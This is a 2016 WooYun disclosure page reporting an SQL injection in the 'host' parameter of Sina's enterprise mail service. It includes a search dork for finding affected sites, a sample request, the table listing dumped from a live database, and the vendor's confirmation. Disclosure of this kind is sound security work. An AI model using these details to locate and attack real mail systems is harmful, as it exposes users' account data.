当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185845

漏洞标题:新浪企业邮箱一处SQL注射漏洞(N多企业躺枪)

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2016-03-17 18:43

修复时间:2016-06-16 10:10

公开时间:2016-06-16 10:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-17: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-12: 细节向核心白帽子及相关领域专家公开
2016-05-22: 细节向普通白帽子公开
2016-06-01: 细节向实习白帽子公开
2016-06-16: 细节向公众公开

简要描述:

RT

详细说明:

登陆页 intext:新浪企业邮箱 一切由你开始

QQ20160317-14@2x.png


案例

http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
......


参数host存在注入

漏洞证明:

以http://**.**.**.**/为例

GET / HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2
Cookie: Email=usrmdinst_0


QQ20160317-13@2x.png


Database: sinanet
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| pop_mail_recovery | 2123484 |
| maillistmember | 283314 |
| email | 280634 |
| userauth | 280633 |
| userauth_log | 80729 |
| SNSTORE | 48563 |
| `domain` | 41556 |
| department | 36993 |
| admin | 24113 |
| enterprise | 22700 |
| maillistprev | 20215 |
| CONSUME | 14352 |
| businesscard | 10000 |

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-18 10:09

厂商回复:

感谢关注新浪安全,问题正在修复。

最新状态:

暂无